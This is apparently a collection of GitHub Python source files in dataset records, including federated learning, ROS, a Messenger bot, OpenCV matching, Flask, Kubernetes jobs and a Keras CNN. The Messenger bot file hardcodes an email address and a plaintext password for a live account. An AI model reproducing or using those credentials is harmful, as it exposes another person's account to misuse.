global_model = global_models[0]\n n_comm_rounds = args.comm_round\n if args.load_model_file and args.alg != 'plot_visual':\n global_model.load_state_dict(torch.load(args.load_model_file))\n n_comm_rounds -= args.load_model_round\n global_para = global_model.state_dict()\n for net_id, net in nets.items():\n net.load_state_dict(global_para)\n\n weights=[]\n for i in range(int(args.n_parties*args.sample_fraction)):\n weights.append([])\n weights[i]=0\n logger.info(\"Initializing nets\")\n\n for round in range(args.comm_round):\n logger.info(\"in comm round:\" + str(round))\n\n arr = np.arange(args.n_parties)\n np.random.shuffle(arr)\n selected = arr[:int(args.n_parties * args.sample_fraction)]\n\n local_data_points=[len(net_dataidx_map[r]) for r in selected]\n \n index=0\n for i in range(len(local_data_points)):\n weights[i]+=local_data_points[i]\n\n global_para = global_model.state_dict()\n\n local_train_net(nets, selected, args, train_dl_set=train_dl_local_set, test_dl = test_dl, device=device)\n\n if((round+1)%args.skip==0):\n print(\"updating global\")\n\n \n for idx in range(int(args.n_parties* args.sample_fraction)):\n net_para = nets[idx].cpu().state_dict()\n weight=weights[idx]/sum(weights)\n if idx == 0:\n for key in net_para:\n\n global_para[key]=net_para[key]*weight\n else:\n for key in net_para:\n\n global_para[key]+=net_para[key]*weight\n global_model.load_state_dict(global_para)\n\n logger.info('global n_training: %d' % len(train_dl_global))\n logger.info('global n_test: %d' % len(test_dl))\n\n\n\n global_model.cuda()\n train_acc, train_loss = compute_accuracy(global_model, train_dl_global, device=device)\n test_acc, conf_matrix, _ = compute_accuracy(global_model, test_dl, get_confusion_matrix=True, device=device)\n\n logger.info('>> Global Model Train accuracy: %f' % train_acc)\n logger.info('>> Global Model Test accuracy: %f' % test_acc)\n logger.info('>> Global Model Train loss: %f' % train_loss)\n mkdirs(args.modeldir+'fedavg/')\n global_model.to('cpu')\n\n torch.save(global_model.state_dict(), args.modeldir+'fedavg/'+'globalmodel'+args.log_file_name+'.pth')\n torch.save(nets[0].state_dict(), args.modeldir+'fedavg/'+'localmodel0'+args.log_file_name+'.pth')\n \n for net_id, net in nets.items():\n net.load_state_dict(global_para)\n weights[net_id]=0\n\n\n\n","repo_name":"MediaBrain-SJTU/FedSkip","sub_path":"main_skip.py","file_name":"main_skip.py","file_ext":"py","file_size_in_byte":15306,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"6"} +{"seq_id":"25169056455","text":"#!/usr/bin/env python\n\nimport rospy\nfrom sensor_msgs.msg import JointState\nimport csv\n\ncsv_file = open('joint_position_wo_saw.csv', 'wb')\ncsv_writer = csv.writer(csv_file)\ncsv_writer.writerow(['timestamp', 'position'])\n\ndef joint_state_callback(msg):\n \"\"\"\n This callback function prints the effort of each joint to the console in a readable format.\n \"\"\"\n joint_efforts = msg.effort\n joint_names = msg.name\n\n timestamp = rospy.get_time()\n \n position = msg.position[4]\n\n csv_writer.writerow([timestamp, position])\n\n print_message = 'Joint States Efforts:\\n'\n for name, effort in zip(joint_names, joint_efforts):\n print_message += ' {}: {:.2f}\\n'.format(name, effort)\n \n rospy.loginfo(print_message)\n\ndef listener():\n \"\"\"\n Initializes the node, subscriber, and spins to keep the node running.\n \"\"\"\n rospy.init_node('joint_state_printer', anonymous=True)\n rospy.Subscriber(\"/joint_states\", JointState, joint_state_callback)\n rospy.spin()\n\nif __name__ == '__main__':\n try:\n listener()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"namhyeongwoo/human_robotics","sub_path":"scripts/joint_state_subscriber.py","file_name":"joint_state_subscriber.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"71200355067","text":"# -*- coding: UTF-8 -*-\nimport pickle, os, string, random, srtgen\nfrom moviepy.editor import *\nfrom fbchat import Client, log\nfrom fbchat.models import *\n\nprefix = [\"o!\", \"O!\"]\nowo_uwu = ['owo', 'uwu']\n\n# this is super gay but it works\nremap_dict = {\n \"?\": \"\\U00002753\",\n \"!\": \"\\U00002757\",\n \"+\": \"\\U00002795\",\n \"-\": \"\\U00002796\",\n \"#\": \"#️⃣\",\n \"*\":\"*️⃣\",\n \"0\": \"0️\",\n \"1\": \"1️⃣\",\n \"2\": \"2️⃣\",\n \"3\": \"3️⃣\",\n \"4\": \"4️⃣\",\n \"5\": \"5️⃣\",\n \"6\": \"6️⃣\",\n \"7\": \"7️⃣\",\n \"8\": \"8️⃣\",\n \"9\": \"9️⃣\",\n}\n\nhelp_items = {\n \"em \": \"Converts your message into emoji\",\n \"sb\": \"Converts your message into retard Spongebob text\",\n \"help\": \"Displays this help message\",\n \"jojoke\": \"Posts a random JoJoke (WIP)\",\n \"wjj\": \"Posts a random 'Watch JoJo' meme (WIP)\",\n \"bajj\": \"Posts a random 'Before/After JoJO' meme (WIP)\",\n \"ynl \": \"Generates a \\\"Your next line is...\\\" GIF with your message\"\n}\n\nprocessing_messages = [\"👌 Comin' right up\", \"⏲️ Working on it...\", \"✔️ Yes sir!\", \"⏲️ Hol' your horses, I'm doing my best!\"]\n\ndef spongebob(msg):\n result = msg.lower()\n flipflop = True\n for x in range(0,len(msg)):\n if ord(msg[x]) in range(ord('a'), ord('z')):\n if flipflop:\n result = result.replace(msg[x],msg[x].upper(), 1)\n flipflop = not flipflop\n return result\n\ndef make_emoji(msg):\n result = (\" \".join(map(lambda y : str(y),msg))).lower()\n\n for x in range(0,len(msg)):\n if ord(msg[x]) in range(ord('a'), ord('z')):\n # cool unicode range magic\n result = result.replace(msg[x], chr(ord(msg[x]) + 0x1F185),1)\n elif msg[x] in remap_dict:\n result = result.replace(msg[x], remap_dict[msg[x]],1)\n\n return result\n\ndef get_jojoke(_type):\n path = \"\"\n if _type == \"jojoke\": path = r\"C:\\Users\\User\\Google Drive\\Jojokes\"\n elif _type == \"wjj\": path = r\"C:\\Users\\User\\Google Drive\\Jojokes\\watch jojo\"\n elif _type == \"bajj\": path = r\"C:\\Users\\User\\Google Drive\\Jojokes\\before after jojo\"\n return os.path.join(path,random.choice([x for x in os.listdir(path) if os.path.isfile(os.path.join(path, x))]))\n\n\nclass OwOBot(Client):\n def onMessage(self, author_id, message_object, thread_id, thread_type, **kwargs):\n if message_object.text == None:\n super(OwOBot, self).onMessage(\n author_id=author_id,\n message_object=message_object,\n thread_id=thread_id,\n thread_type=thread_type,\n **kwargs\n )\n else:\n if author_id == 100009299193226:\n self.reactToMessage(message_object.uid, MessageReaction.YES)\n if message_object.text.lower() in owo_uwu:\n self.reactToMessage(message_object.uid, MessageReaction.LOVE)\n if message_object.text[0:2] in prefix:\n msg_content = message_object.text[2::]\n self.markAsDelivered(thread_id, message_object.uid)\n self.markAsRead(thread_id)\n\n log.info(\"{} from {} in {}\".format(message_object, thread_id, thread_type.name))\n\n if author_id != self.uid:\n args = msg_content.split()\n\n cmd = args[0].lower()\n\n if cmd == \"help\":\n self.send(Message(text=\"Current prefixes: %s\\r\\nAvailable commands:\\r\\n\\t%s\" % (\", \".join(prefix), \"\\r\\n\\t\".join(map(lambda x : \": \".join(map(lambda y : str(y), x)), help_items.items())))), thread_id=thread_id, thread_type=thread_type)\n elif cmd == \"em\":\n self.send(Message(text=make_emoji(\" \".join(args[1::]))), thread_id=thread_id, thread_type=thread_type)\n elif cmd == \"sb\":\n self.send(Message(text=spongebob(\" \".join(args[1::]))), thread_id=thread_id, thread_type=thread_type)\n elif cmd == \"ynl\":\n self.send(Message(text=random.choice(processing_messages)),thread_id=thread_id, thread_type=thread_type)\n srtgen.composite_gif(\" \".join(args[1::]))\n self.sendLocalImage(r\"D:\\Final Renders\\result.gif\",thread_id=thread_id, thread_type=thread_type)\n os.remove(r\"D:\\Final Renders\\result.gif\")\n elif cmd == \"jojoke\":\n self.send(Message(text=random.choice(processing_messages)),thread_id=thread_id, thread_type=thread_type)\n joke = get_jojoke(\"jojoke\")\n self.sendLocalImage(joke,thread_id=thread_id, thread_type=thread_type)\n elif cmd == \"wjj\":\n self.send(Message(text=random.choice(processing_messages)),thread_id=thread_id, thread_type=thread_type)\n joke = get_jojoke(\"wjj\")\n self.sendLocalImage(joke,thread_id=thread_id, thread_type=thread_type)\n elif cmd == \"bajj\":\n self.send(Message(text=random.choice(processing_messages)),thread_id=thread_id, thread_type=thread_type)\n joke = get_jojoke(\"bajj\")\n self.sendLocalImage(joke,thread_id=thread_id, thread_type=thread_type)\n else:\n self.reactToMessage(message_object.uid, MessageReaction.ANGRY)\n self.send(Message(text=\"❌ Invalid command\"),thread_id=thread_id, thread_type=thread_type)\n else:\n super(OwOBot, self).onMessage(\n author_id=author_id,\n message_object=message_object,\n thread_id=thread_id,\n thread_type=thread_type,\n **kwargs\n )\n\nclient = OwOBot(username,password,logging_level=30)\n\nif os.path.isfile('cookies.p'):\n cookies = pickle.load(open('cookies.p','rb'))\n client = OwOBot('bowot.chan@hotmail.com', 'jJIh7SYBAh6wna',session_cookies=cookies,logging_level=30)\n\nsession = client.getSession()\npickle.dump(session,open('cookies.p','wb'))\n\nprint(\"Own id: {}\".format(client.uid))\nclient.listen()","repo_name":"alwynwan/Messenger-Bot","sub_path":"messenger_bot.py","file_name":"messenger_bot.py","file_ext":"py","file_size_in_byte":6231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"19437131825","text":"def run_with_sift():\n MIN_MATCH_COUNT = 5\n\n sift = cv2.xfeatures2d.SURF_create()\n #sift = cv2.ORB_create()\n img1 = cv2.imread('./sample_img/video1_img.png',0) # queryImage\n #img1 = imutils.resize(img1, width=800)\n kp1, des1 = sift.detectAndCompute(img1,None)\n\n #img2 = cv2.imread('./sample_img/all_object.png',0) # trainImage\n\n cam = cv2.VideoCapture('./videos/videofile.mp4')\n cam2 = cv2.VideoCapture('./videos/videofile_inroom.avi')\n while True:\n (ret, img2) = cam.read()\n (ret, img2_2) = cam2.read()\n if cv2.waitKey(18) == ord('e'):\n bbx:BBoundingBox = crop_img_process(img2)\n img1 = img2[bbx.pY:(bbx.pY + bbx.height), bbx.pX:(bbx.pX + bbx.width), 0]\n cv2.imshow('im_out', img1)\n\n # find the keypoints and descriptors with SIFT\n kp2, des2 = sift.detectAndCompute(img2,None)\n\n #flann base matcher\n FLANN_INDEX_KDTREE = 0\n index_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)\n search_params = dict(checks = 50)\n flann = cv2.FlannBasedMatcher(index_params, search_params)\n matches = flann.knnMatch(des1,des2,k=2)\n good = []\n for m,n in matches:\n if m.distance < 0.7*n.distance:\n good.append(m)\n\n #bf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\n #matches = bf.match(des1, des2)\n #good = sorted(matches, key = lambda x:x.distance)\n # store all the good matches as per Lowe's ratio test.\n \n \n\n if len(good) > MIN_MATCH_COUNT:\n src_pts = np.float32([ kp1[m.queryIdx].pt for m in good ]).reshape(-1,1,2)\n dst_pts = np.float32([ kp2[m.trainIdx].pt for m in good ]).reshape(-1,1,2)\n\n M, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC,5.0)\n matchesMask = mask.ravel().tolist()\n\n h,w = img1.shape\n pts = np.float32([ [0,0],[0,h-1],[w-1,h-1],[w-1,0] ]).reshape(-1,1,2)\n dst = cv2.perspectiveTransform(pts,M)\n\n x, y = [], []\n for element in np.int32(dst):\n for item in element:\n x.append(item[0])\n y.append(item[1])\n x1, x2, y1, y2 = min(x), max(x), min(y), max(y)\n if x1 >= 0 and x2 >= 0 and y1 >= 0 and y2 >= 0:\n img1 = img2[y1:y2, x1:x2, 0]\n cv2.imshow('im_out', img1)\n img2 = cv2.rectangle(img2, (x1, y1), (x2, y2), (0, 255, 0), 1)\n #img2 = cv2.polylines(img2,np.int32(dst),True,255,3, cv2.LINE_AA)\n else:\n print (\"Not enough matches are found - %d/%d\" % (len(good),MIN_MATCH_COUNT))\n matchesMask = None\n\n draw_params = dict(matchColor = (0,255,0), # draw matches in green color\n singlePointColor = None,\n matchesMask = matchesMask, # draw only inliers\n flags = 2)\n\n img3 = cv2.drawMatches(img1,kp1,img2,kp2,good,None,**draw_params)\n cv2.imshow('gray', img3)\n cv2.imshow('cam2', img2_2)\n\n #update the query image\n kp1, des1 = sift.detectAndCompute(img1, None)\n\n if cv2.waitKey(1) == 27:\n break\n\ndef run_with_orb():\n MIN_MATCH_COUNT = 4\n ## Create ORB object and BF object(using HAMMING)\n #orb = cv2.ORB_create()\n orb = cv2.ORB_create()\n img1 = cv2.imread('./sample_img/test1.jpg')\n img1 = imutils.resize(img1, width=400)\n img2 = cv2.imread('./sample_img/test1.1.jpg')\n img2 = imutils.resize(img2, width=400)\n\n gray2 = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)\n gray1 = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)\n\n ## Find the keypoints and descriptors with ORB\n kpts1, descs1 = orb.detectAndCompute(gray1,None)\n kpts2, descs2 = orb.detectAndCompute(gray2,None)\n\n ## match descriptors and sort them in the order of their distance\n bf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\n matches = bf.match(descs1, descs2)\n dmatches = sorted(matches, key = lambda x:x.distance)\n\n ## extract the matched keypoints\n src_pts = np.float32([kpts1[m.queryIdx].pt for m in dmatches]).reshape(-1,1,2)\n dst_pts = np.float32([kpts2[m.trainIdx].pt for m in dmatches]).reshape(-1,1,2)\n\n ## find homography matrix and do perspective transform\n M, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC,5.0)\n h,w = img1.shape[:2]\n pts = np.float32([ [0,0],[0,h-1],[w-1,h-1],[w-1,0] ]).reshape(-1,1,2)\n dst = cv2.perspectiveTransform(pts,M)\n\n ## draw found regions\n img2 = cv2.polylines(img2, [np.int32(dst)], True, (0,0,255), 1, cv2.LINE_AA)\n cv2.imshow(\"found\", img2)\n\n ## draw match lines\n res = cv2.drawMatches(img1, kpts1, img2, kpts2, dmatches[:20],None,flags=2)\n\n cv2.imshow(\"orb_match\", res);\n\n cv2.waitKey();cv2.destroyAllWindows()\n","repo_name":"vohoangan123456/ThesisImplementationObjectTracking","sub_path":"ThesisImplementationObjectTracking/my_working_space/stuffs/abandoned_functions.py","file_name":"abandoned_functions.py","file_ext":"py","file_size_in_byte":4872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"2077814007","text":"from odoo import models, fields, api, exceptions\nfrom odoo.exceptions import UserError\nfrom datetime import datetime\nclass ext(models.Model):\n _inherit=\"account.move\"\n def create_auto_invoices(self):\n todaydate=datetime.now().date()\n enrolement_status = self.env['school.enrollment.status'].search([('name','=',\"Enrolled\")])\n enrollment_ids=[i.id for i in enrolement_status]\n students= self.env['school.student'].search([('enrollment_status_ids','in',enrollment_ids)])\n journals = self.env['account.journal'].search([('name','=',\"Monthly Bills\")])\n journal_ids=[i.id for i in journals]\n tuition_plans=self.env[\"tuition.plan\"].search([('student_id','in',students.ids),('journal_id','in',journal_ids),('state','=','posted')])\n \n # installments=env[\"tuition.installment\"].search([(\"tuition_plan_id\",\"in\",tuition_plans.ids),(\"x_inv_date\",'=',todaydate)])\n\n for plan in tuition_plans:\n while plan.next_installment_id.x_inv_date==todaydate:\n plan.button_create_charge()\n return\n","repo_name":"Odolution/lacas","sub_path":"ol_auto_invoice/models/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"30793276105","text":"import requests\nfrom dotenv import load_dotenv\nfrom os import getenv\nfrom datetime import datetime\n\nGENDER = \"male\"\nWEIGHT_KG = 77.7\nHEIGHT_CM = 182.88\nAGE = 22\n\nload_dotenv()\n# Nutrionix API\nNUTRITIONIX_API_ID = getenv(\"NUTRITIONIX_API_ID\")\nNUTRITIONIX_API_KEY = getenv(\"NUTRITIONIX_API_KEY\")\nnutritionix_endpoint = \"https://trackapi.nutritionix.com/v2/natural/exercise\"\n\n# Sheety API\nSPREADSHEET_ENDPOINT = getenv(\"SPREADSHEET_ENDPOINT\")\nSPREADSHEET_AUTH_CODE = getenv(\"SPREADSHEET_AUTH_CODE\")\n\nquery = input(\"Tell me which exercises you did: \")\n\nexercise_headers = {\n \"x-app-id\" : NUTRITIONIX_API_ID,\n \"x-app-key\" : NUTRITIONIX_API_KEY,\n}\n\nexercise_params = {\n \"query\" : query,\n \"gender\" : GENDER,\n \"weight_kg\" : WEIGHT_KG,\n \"height_cm\" : HEIGHT_CM,\n \"age\" : AGE,\n}\n\nexercise_data = requests.post(url=nutritionix_endpoint, json=exercise_params, headers=exercise_headers)\nexercise_data.raise_for_status()\nresult = exercise_data.json()\n# print(f\"Nutritionix API call: \\n {result} \\n\")\n\ntoday = datetime.now()\ntoday_date = today.strftime(\"%d/%m/%Y\")\ntime_now = today.strftime(\"%H:%M:%S\")\n\n# Sheety API\nGOOGLE_SHEET_NAME = \"sheet1\"\nsheety_headers = {\n \"Authorization\" : SPREADSHEET_AUTH_CODE,\n}\nsheety_endpoint = SPREADSHEET_ENDPOINT\n\nfor exercise in result[\"exercises\"]:\n new_row = {\n GOOGLE_SHEET_NAME : {\n \"date\" : today_date,\n \"time\" : time_now,\n \"exercise\" : exercise[\"name\"].title(),\n \"duration\" : exercise[\"duration_min\"],\n \"calories\" : exercise[\"nf_calories\"],\n\n }\n }\n\n response = requests.post(url=sheety_endpoint, json=new_row, headers=sheety_headers)\n print(response.text)","repo_name":"shrijanlakhey/100-days-of-Python","sub_path":"038/workout_tracker.py","file_name":"workout_tracker.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"73644100026","text":"import os\n\nfrom flask import Flask, render_template, session, request\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\n\napp = Flask(__name__)\n\nengine = create_engine(os.getenv(\"DATABASE_URL\"))\ndb = scoped_session(sessionmaker(bind=engine))\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n@app.route(\"/booker\", methods=[\"GET\", \"POST\"])\ndef booker():\n flights = []\n error = \"\"\n if request.method == \"GET\" or \"POST\":\n flights = db.execute(\"select * from flights\")\n if request.method == \"POST\":\n try:\n flight_id = request.form.get(\"flightId\")\n surname = request.form.get(\"surname\")\n name = request.form.get(\"name\")\n email = request.form.get(\"email\")\n # Validation einbauen\n db.execute(\"insert into passengers (surname, name, email, flight_id) values (:surname, :name, :email, :flight_id)\", \n {\"surname\": surname, \"name\": name, \"email\": email, \"flight_id\": flight_id})\n db.commit()\n except ValueError:\n error = \"Please select a flight!\"\n return render_template(\"booker.html\", flights=flights, error=error)\n\n@app.route(\"/login\")\ndef login():\n return render_template(\"login.html\")\n\n@app.route(\"/addFlight\", methods=[\"GET\", \"POST\"])\ndef addFlight():\n if request.method == \"POST\":\n origin = request.form.get(\"o\")\n destination = request.form.get(\"dest\")\n duration = request.form.get(\"dur\")\n db.execute(\"insert into flights (origin, destination, duration) values (:origin, :destination, :duration)\", \n {\"origin\": origin, \"destination\": destination, \"duration\": duration})\n print(f\"Added flight from {origin} to {destination} lasting {duration} minutes\")\n db.commit()\n return render_template(\"addFlight.html\")\n","repo_name":"Thien-An-Ngo/harvardCourse","sub_path":"myProjects/tests/test1/src/applications.py","file_name":"applications.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"39723414482","text":"\nfrom flask import Flask, request, jsonify\n\napp = Flask(__name__)\n\nimport re\nimport torch\nfrom model import ChatModel\n\nwith open('data.txt', 'r') as file:\n data = file.read()\n\ndata = re.sub('\\n+', '\\n', data)\n# Parse the text into a list of question-answer pairs\nqa_pairs = data.strip().split('\\n')\n\n# Split each pair into a question and an answer\nqa_pairs = [pair.split(': ')[1] for pair in qa_pairs]\nq = []\nans = []\naq = True\nfor pair in range(len(qa_pairs)):\n #pair -= 1A\n if pair % 2 == 0:\n q.append(qa_pairs[pair])#.split(\";;\"))\n else:\n ans.append(qa_pairs[pair])\n\nmodel = ChatModel(q,ans,device=\"cpu\")\n\n\n@app.route('/predict', methods=['GET'])\ndef predict():\n # Get the 'message' parameter from the query string\n message = request.args.get('message')\n print(message)\n return jsonify(answer=model.chat(str(message)))\n\nif __name__ == '__main__':\n app.run(debug=True, port=5000)\n","repo_name":"sadik-abd/low_end_chatbot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"29085951938","text":"#!/usr/bin/env python\nimport boto3\nfrom kubernetes import client, config, watch\nfrom random import randint\n\ndef createJob(api, counter):\n jobName = f\"job-search-worker-{counter}\"\n\n # Create and configure a container\n container = client.V1Container(\n name=\"c\",\n image=\"bigtexasdork/job-search-worker\",\n resources=client.V1ResourceRequirements(\n limits={\"memory\": \"500M\", \"cpu\": \"1\"},\n requests={\"memory\": \"300M\", \"cpu\": \".5\"}\n )\n )\n\n # Create and configure a spec section\n template = client.V1PodTemplateSpec(\n metadata=client.V1ObjectMeta(labels={\"app\": \"search-worker\"}),\n spec=client.V1PodSpec(\n containers=[container],\n restart_policy=\"OnFailure\"\n )\n )\n \n # Create and configure a Job spec\n jobSpec = client.V1JobSpec(\n completions=1,\n parallelism=1,\n template=template,\n ttl_seconds_after_finished=15\n )\n\n # Create the Job\n job = client.V1Job(\n metadata=client.V1ObjectMeta(name=jobName),\n spec=jobSpec\n )\n\n api.create_namespaced_job(\n namespace=\"default\",\n body=job\n )\n\n print(f\"Create job: {jobName}\")\n\ndef main():\n config.load_kube_config()\n api = client.BatchV1Api()\n\n sqs = boto3.resource('sqs')\n\n queue = sqs.get_queue_by_name(QueueName='a-kube-test-queue.fifo')\n\n cntr = 0 # used for job name uniqueness\n data = [line.strip() for line in open(\"50words\", 'r')]\n for msg in data:\n cntr += 1\n response = queue.send_message(\n MessageBody=msg + str(randint(0,999)), # randomize the msg\n MessageGroupId=\"travelers\", # needed for FIFO\n MessageAttributes={\n 'Sleep': {\n 'StringValue': str(randint(10,29)),\n 'DataType': 'Number'\n }\n }\n )\n\n print('MessageId: {0}'.format(response.get('MessageId')))\n print('MD5OfMessageBody: {0}'.format(response.get('MD5OfMessageBody')))\n createJob(api, cntr)\n\nif __name__ == '__main__':\n main()\n","repo_name":"BigTexasDork/k8s-job-poc","sub_path":"oneJobPerMessage.py","file_name":"oneJobPerMessage.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"30984914466","text":"from dataclasses import (\n asdict,\n dataclass,\n field,\n)\nfrom datetime import (\n datetime,\n timedelta,\n)\n\nimport jwt\nfrom utils import (\n dict_factory,\n get_scopes,\n)\n\nfrom popug_schema_registry.models.v1.task_created_event_schema import UserRoles\nfrom popug_sdk.conf import settings\n\n\n@dataclass\nclass TokenData:\n public_id: str\n username: str\n email: str\n role: UserRoles\n scopes: list[str] = field(init=False)\n\n def __post_init__(self) -> None:\n self.scopes = get_scopes(self.role)\n\n def generate_token(self, expires_delta: int) -> str:\n encode_data = asdict(self, dict_factory=dict_factory)\n encode_data[\"exp\"] = datetime.utcnow() + timedelta(expires_delta)\n\n token: str = jwt.encode( # type: ignore\n encode_data,\n settings.security.secret_key,\n algorithm=settings.security.algorithm,\n )\n\n return token\n","repo_name":"Drozdetskiy/popug_jira","sub_path":"popug_auth/src/token_data.py","file_name":"token_data.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"6"} +{"seq_id":"2590275077","text":"\nimport urllib2\nimport json\n\nfrom datetime import datetime, timedelta\n\nclass timeSync:\n syncUrl = r'http://www.portvisibility.co.uk/visibility/tools/showTime.php'\n \n def __init__(self):\n response = urllib2.urlopen(self.syncUrl)\n timeJson = response.read()\n \n self.time = json.loads(timeJson)['time']\n self.date = json.loads(timeJson)['date']\n \n def printTimeStr(self):\n print(self.dateTime)\n \n def getTimeWithTimezoneOffset(self, timezoneOffset):\n t = datetime.strptime(self.time, '%H:%M:%S %Z')\n d = datetime.strptime(self.date, '%Y-%m-%d')\n t = t + timedelta(hours=timezoneOffset)\n validatedTime = '%d-%02d-%02d %02d:%02d:%02d' % (d.year, d.month, d.day, t.hour, t.minute, t.second)\n \n return validatedTime\n ","repo_name":"RedSpiderMkV/Windows-Time-Update","sub_path":"src/Legacy/windowsTimeSync.py","file_name":"windowsTimeSync.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"6"} +{"seq_id":"12366722422","text":"#Import neccessary packages\n\nfrom os import listdir\nimport sys\n#sys.path.append(\"/opt/anaconda2/lib/python2.7/site-packages/cv2\")\n#/usr/local/lib/python2.7/dist-packages/cv2\n\n#sys.path.append(\"/usr/local/lib/python3.5/dist-packages/matplotlib\")\n\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\n#from matplotlib import pyplot as plt\n\nfrom keras.models import Sequential\n#from keras.layers.normalization import BatchNormalization\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\n#from keras.layers.core import Activation, Flatten, Dropout, Dense\nfrom keras.layers.core import Activation, Flatten, Dense\nfrom keras import backend as K\nfrom keras.optimizers import Adam\nfrom keras.preprocessing import image\nfrom keras.preprocessing.image import ImageDataGenerator,img_to_array\nfrom keras.utils import to_categorical\n\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.preprocessing import LabelBinarizer\n#from sklearn.preprocessing import MultiLabelBinarizer\nfrom sklearn.model_selection import train_test_split\n\n\n#Initialise few vars\nEPOCHS = 10\nINIT_LR = 1e-3\nBS = 32\ndefault_image_size = tuple((256, 256))\nimage_size = 0\ndirectory_root = '/home/ai16/project/main_project/Data/Plantvillage'\nwidth=256\nheight=256\ndepth=3\n\n#Function to convert images to array\ndef convert_image_to_array(image_dir):\n try:\n image = cv2.imread(image_dir)\n if image is not None :\n image = cv2.resize(image, default_image_size) \n return img_to_array(image)\n else :\n return np.array([])\n except Exception as e:\n #print(f\"Error : {e}\")\n print(\"convert_image_to_array() : Error when converting Image to Array:\"+e)\n return None\n\n#Fetch images from directory and convert each to an array...assign labels to it (folder name)\nimage_list, label_list = [], []\ntry:\n print(\"[INFO] Loading images from folders...\")\n root_dir = listdir(directory_root)\n for plant_folder in root_dir :\n print(\"Processing images from folder... ->: \"+ plant_folder)\n #below will return list of image files within the folder\n #plant_disease_folder_list = listdir(directory_root+\"/\"+plant_folder)\n Images_In_Folder = listdir(directory_root+\"/\"+plant_folder)\n #print \"------------------\"\n #print(\"\\n\")\n\n #New Code\n #for image in plant_disease_folder_list[:200]:\n for image in Images_In_Folder:\n image_filename = directory_root+\"/\"+plant_folder+\"/\"+image \n if image_filename.endswith(\".jpg\") == True or image_filename.endswith(\".JPG\") == True:\n #print \"Image filename (Abs. path) ->\" + image_filename \n image_list.append(convert_image_to_array(image_filename))\n label_list.append(plant_folder)\n\n\n\n print(\"[INFO] Image loading completed from all directories....\") \nexcept Exception as e:\n print(\"Try...Catch: Error when loding/processing images...: \"+str(e))\n\n\"\"\"\nprint(\"First Image in Image list...\")\nprint(image_list[0])\nprint(\"shape...\")\nprint(image_list[0].shape)\n\nprint(\"Corres. label in Label list...\")\nprint(label_list)\nprint(\"Length of label_list...\")\nprint(len(label_list))\n\"\"\"\n\n#Get Size of Processed Image\nTot_No_Of_Images = len(image_list) \nprint(\"Total No. of Images :->\"+str(Tot_No_Of_Images))\n\n#Convert labels to numeric values (Ex. 0,1,2,3...based on categories)\nle=LabelEncoder()\nlabel_list_num=le.fit_transform(label_list)\nlabel_classes = le.classes_\n#print(label_classes)\n\n\n#print label_list_num\nprint(\"Total number of unique categores...=\"+str(len(np.unique(label_list_num))))\nprint(np.unique(label_list_num))\nn_classes=len(np.unique(label_list_num))\n\n\n#convert to binary values (one hot encoding)\nlabel_list_num_bin=to_categorical(label_list_num)\n#print(\"After binary conversion...\")\n#print(label_list_num_bin)\n\n\n#Tensor Flow compatible (4-d array) and Normalize the pixels\n#Output will also follow the patters..\n#np_image_list = np.array(image_list, dtype=np.float16) / 225.0\nnp_image_list = np.array(image_list, dtype=np.float16) / 255.0\n\n\"\"\"\nprint(\"Shape of np_image_list....\")\nprint(np_image_list.shape)\nprint(\"Shape of ..label_list_num_bin..\")\nprint(label_list_num_bin.shape)\n\"\"\"\n\n#Create Train and Test set\nprint(\"[INFO] Spliting data to train, test\")\n#x_train, x_test, y_train, y_test = train_test_split(np_image_list, image_labels, test_size=0.2, random_state = 42) \n\nx_train, x_test, y_train, y_test = train_test_split(np_image_list, label_list_num_bin, test_size=0.2, random_state = 42) \n\n\n'''\nprint \"x_train\"\nprint x_train\nprint \"x_test\"\nprint x_test\nprint \"y_train\"\nprint y_train\nprint \"y_test\"\nprint y_test\n'''\n\n#Image Augmentation\naug = ImageDataGenerator(\n rotation_range=25, \n width_shift_range=0.1,\n height_shift_range=0.1, \n shear_range=0.2, \n zoom_range=0.2,\n horizontal_flip=True, \n fill_mode=\"nearest\")\n\n\n#Build CNN layers\nmodel = Sequential()\n\n#width=256, height=256, depth=3\n\ninputShape = (height, width, depth)\n\n#For Tensoflow....channels_last........For Theano...channels_first\n#(samples,rows,cols,channels)....channels dimension is last param (index = 3)\n#Defines where is the 'channels' data in the input data\nprint(\"Image data format...\")\nprint(K.image_data_format())\n\nchanDim = -1\nif K.image_data_format() == \"channels_first\":\n inputShape = (depth, height, width)\n chanDim = 